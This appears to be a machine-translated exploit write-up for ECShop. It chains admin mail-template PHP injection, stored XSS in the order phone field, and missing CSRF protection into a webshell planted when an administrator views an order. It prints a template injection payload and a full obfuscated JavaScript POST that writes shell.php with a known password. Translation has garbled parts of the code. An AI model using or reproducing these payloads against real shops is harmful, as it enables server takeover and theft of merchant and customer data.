Ecshop csrf getshell 0day

0x0 backend getshell

At the place where the order is submitted, you can see that the Code calls get_mail_template () to obtain the content of the remind_of_new_order template, and then puts it in fetch for execution, if you can control the content of the remind_of_new_order template, let ecshop execute our command. Www. ashker. NEt

In the background, you can find the email template in template management and change the remind_of_new_order content
{$ Phpinfo () ']; phpinfo ();/*}

Then we can see that the code is replaced with "<? Php echo $ this-> _ var ['phpinfo () ']; phpinfo ();/*'];?> "
The code is successfully executed.

0x1 foreground xss

The front-end is not sufficiently filtered in some places, which allows users to construct malicious javascript to complete xss attacks against the background administrator.
After registering a user, you can buy anything at will. In the receiver's information, only the local client is checked in the phone column, without backend filtering, which is easy to detect xss attacks.

 

0x2 xss + getshell in the background

Combine the two above
Because there is no csrf protection, the xss can go to the background at the front end and ask the Administrator to help us getshell.
The following is the js Implementation of getshell:
Var Shelldata = 'subject = % C3 % DC % C2 % EB % D5 % D2 % BB % D8 & mail_type = 0 & tpl = 1 & content = % 7B % 24user_name % 27% 5D % signature % 28base64_decode % 28% 27c2hlbGwucGhw % 27% 2Cbase64_decode % 29% signature % 3D % 28% 27% 29% 3 Becho + % 24var % 5B % 29% 24user_name % 7D % 0D % 0A % 3C % 2Fp % 3E % 0D % 0A % 3Cp % 3E % 7B % 24user_name % 7D % C4 % FA % BA % C3 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % C4 % FA % D2 % D1 % BE % AD % BD % F8 % D0 % D0 % C1 % CB % C3 % DC % C2 % EB % D6 % D8 % D6 % C3 % B5 % C4 % B2 % D9 % D7 % F7 % A3 % AC % C7 % EB % B5 % E3 % BB % F7 % D2 % D4 % CF % C2 % C1 % B4 % BD % D3 % 28% BB % F2 % D5 % DF % B8 % B4 % D6 % C6 % B5 % BD % C4 % FA % B5 % C4 % E4 % AF % C0 % C0 % C6 % F7 % 29% 3A % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 3Ca + target % 3D % 22_blank % 22 + href % 3D % 22% 7B % 24reset_email % 7D % 22% 3E % 7B % 24reset_email % 7D % 3C % 2Fa % 3E % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % D2 % D4 % C8 % B7 % C8 % CF % C4 % FA % b5 % C4 % D0 % C2 % C3 % DC % C2 % EB % D6 % D8 % D6 % C3 % B2 % D9 % D7 % F7 % A3 % 1% 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24shop_name % 7D % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24send_date % 7D % 3C % 2Fp % 3E '; try {var xml = window. XMLHttpRequest? (New XMLHttpRequest (): (new ActiveXObject ('Microsoft. xmlhttp'); xml. open ("POST", '/ecshop/upload/admin/mail_template.php? Act = save_template ', false); xml. setRequestHeader ('content-type', 'application/x-www-form-urlencoded'); xml. onreadystatechange = function () {if (xml. readyState = 4) {}}; xml. send (Shelldata);} catch (e ){}
 

You can upload and reference this js image or directly reference it from an external website. For test convenience, reference from local

Finally, submit the order. The administrator can access the order.
Then the user's front-end password is retrieved. A shell. php statement is generated in the root directory, and the password is 207.